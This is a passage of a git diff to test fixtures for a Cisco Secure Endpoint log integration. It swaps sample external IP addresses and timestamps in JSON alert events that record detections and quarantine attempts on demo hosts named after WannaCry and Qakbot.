Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764547600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7997,7 +7997,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -8050,7 +8050,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -8067,8 +8067,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025487606Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:39.764551600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -8090,7 +8090,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -8140,7 +8140,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -8157,8 +8157,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025489842Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764556100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -8180,7 +8180,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log index dc134052124..71eea7f5cbc 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log @@ -1,62 +1,62 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 